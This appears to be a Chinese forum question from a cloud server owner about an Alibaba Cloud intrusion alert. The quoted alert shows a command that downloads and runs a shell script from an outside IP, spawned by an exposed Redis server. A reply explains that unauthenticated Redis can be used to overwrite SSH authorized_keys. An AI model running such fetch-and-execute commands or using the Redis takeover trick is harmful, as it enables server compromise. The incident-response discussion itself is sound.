收到阿里云紧急安全事件提醒怎么办?

ponponon
  • 1.5k

图片.png

这是咋回事?我的云服务器只能是公钥登录,都不能账号密码呀,黑客是怎么来我的服务器上执行代码的?

难道是因为我开了 redis 的原因吗?

图片.png

通过 redis 的安全漏洞入侵的?

该告警由如下引擎检测发现:
命令行: sh -c (wget -O /tmp/russ http://106.246.224.219/russia.sh || curl -o /tmp/russ http://106.246.224.219/russia.sh); chmod 700 /tmp/russ; /tmp/russ
进程PID: 756468
进程文件名: dash
父进程ID: 632
父进程: redis-check-rdb
父进程文件路径: /usr/bin/redis-check-rdb
进程链:

-[632]  /usr/bin/redis-server *:6379
事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于bash、powershell、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略。
回复
阅读 731
1 个回答
ssseerr999
  • 1.1k

是不是redis没有密码而且端口开放在公网了

百度一下可以找到很多关于redis的漏洞和工具

也不是 ssh密钥登录就安全,用密钥登录可以防被猜密码

redis有权限的话可以直接覆盖~/.ssh/authorized_keys,黑客替换之后就能直接登录ssh

宣传栏